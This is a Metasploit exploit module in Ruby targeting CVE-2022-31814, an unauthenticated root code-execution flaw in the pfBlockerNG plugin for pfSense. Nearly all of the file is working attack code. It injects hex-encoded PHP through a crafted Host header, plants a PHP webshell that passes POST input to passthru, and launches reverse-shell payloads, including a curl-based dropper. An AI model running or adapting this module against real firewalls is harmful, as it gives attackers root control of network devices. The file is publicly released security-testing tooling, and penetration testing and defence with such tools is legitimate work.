1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::CmdStager
11
  include Msf::Exploit::FileDropper
12

13
  prepend Msf::Exploit::Remote::AutoCheck
14

15
  def initialize(info = {})
16
    super(
17
      update_info(
18
        info,
19
        'Name' => 'pfSense plugin pfBlockerNG unauthenticated RCE as root',
20
        'Description' => %q{
21
          pfBlockerNG is a popular pfSense plugin that is not installed by default. It's generally used to
22
          block inbound connections from whole countries or IP ranges. Versions 2.1.4_26 and below are affected
23
          by an unauthenticated RCE vulnerability that results in root access. Note that version 3.x is unaffected.
24
        },
25
        'Author' => [
26
          'IHTeam', # discovery
27
          'jheysel-r7' # module
28
        ],
29
        'References' => [
30
          [ 'CVE', '2022-31814' ],
31
          [ 'URL', 'https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/'],
32
          [ 'EDB', '51032' ]
33
        ],
34
        'License' => MSF_LICENSE,
35
        'Platform' => 'unix',
36
        'Privileged' => false,
37
        'Targets' => [
38
          [
39
            'Unix Command',
40
            {
41
              'Platform' => 'unix',
42
              'Arch' => ARCH_CMD,
43
              'Type' => :unix_cmd,
44
              'DefaultOptions' => {
45
                'PAYLOAD' => 'cmd/unix/reverse_openssl'
46
              }
47
            }
48
          ],
49
          [
50
            'BSD Dropper',
51
            {
52
              'Platform' => 'bsd',
53
              'Arch' => [ARCH_X64],
54
              'Type' => :bsd_dropper,
55
              'CmdStagerFlavor' => [ 'curl' ],
56
              'DefaultOptions' => {
57
                'PAYLOAD' => 'bsd/x64/shell_reverse_tcp'
58
              }
59
            }
60
          ]
61
        ],
62
        'DefaultTarget' => 1,
63
        'DisclosureDate' => '2022-09-05',
64
        'DefaultOptions' => {
65
          'SSL' => true,
66
          'RPORT' => 443
67
        },
68
        'Notes' => {
69
          'Stability' => [ CRASH_SERVICE_DOWN ],
70
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
71
          'Reliability' => [ REPEATABLE_SESSION, ]
72
        }
73
      )
74
    )
75

76
    register_options(
77
      [
78
        OptString.new('WEBSHELL_NAME', [
79
          false, 'The name of the uploaded webshell sans the ".php" ending. This value will be randomly generated if left unset.', nil
80
        ])
81
      ]
82
    )
83
  end
84

85
  def upload_shell
86
    print_status 'Uploading shell...'
87
    if datastore['WEBSHELL_NAME'].blank?
88
      @webshell_name = "#{Rex::Text.rand_text_alpha(8..16)}.php"
89
    else
90
      @webshell_name = "#{datastore['WEBSHELL_NAME']}.php"
91
    end
92
    @parameter_name = Rex::Text.rand_text_alpha(4..12)
93
    print_status("Webshell name is: #{@webshell_name}")
94
    web_shell_contents = <<~EOF
95
      <?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php echo(passthru($_POST["#{@parameter_name}"]));');
96
    EOF
97
    encoded_php = web_shell_contents.unpack('H*')[0].upcase
98
    send_request_raw(
99
      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),
100
      'headers' => {
101
        'Host' => "' *; echo '16i #{encoded_php} P' | dc | php; '"
102
      }
103
    )
104
    sleep datastore['WfsDelay']
105
    register_file_for_cleanup("/usr/local/www/#{@webshell_name}")
106
  end
107

108
  def check
109
    test_file_name = Rex::Text.rand_text_alpha(4..12)
110
    test_file_content = Rex::Text.rand_text_alpha(4..12)
111
    test_injection = <<~EOF
112
      <?php echo file_put_contents('/usr/local/www/#{test_file_name}','#{test_file_content}');
113
    EOF
114
    encoded_php = test_injection.unpack('H*')[0].upcase
115
    send_request_raw(
116
      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),
117
      'headers' => {
118
        'Host' => "' *; echo '16i #{encoded_php} P' | dc | php; '"
119
      }
120
    )
121
    sleep datastore['WfsDelay']
122

123
    check_resp = send_request_cgi(
124
      'method' => 'GET',
125
      'uri' => normalize_uri(target_uri.path, "/#{test_file_name}")
126
    )
127
    return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_resp.nil? || !check_resp.code == 200 || !check_resp.body.include?(test_file_content)
128

129
    # Clean up test webshell "/usr/local/www/#{test_file_name}"
130
    clean_up_injection = <<~EOF
131
      <?php echo unlink('/usr/local/www/#{test_file_name}');
132
    EOF
133
    encoded_clean_up = clean_up_injection.unpack('H*')[0].upcase
134
    send_request_raw(
135
      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),
136
      'headers' => {
137
        'Host' => "' *; echo '16i #{encoded_clean_up} P' | dc | php; '"
138
      }
139
    )
140
    Exploit::CheckCode::Vulnerable
141
  end
142

143
  def execute_command(cmd, _opts = {})
144
    send_request_cgi({
145
      'method' => 'POST',
146
      'uri' => normalize_uri(target_uri.path, @webshell_name),
147
      'headers' => {
148
        'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8'
149
      },
150
      'vars_post' => {
151
        @parameter_name.to_s => cmd
152
      }
153
    })
154
  end
155

156
  def exploit
157
    upload_shell
158
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
159
    case target['Type']
160
    when :unix_cmd
161
      execute_command(payload.encoded)
162
    when :bsd_dropper
163
      execute_cmdstager
164
    end
165
  end
166
end
167

168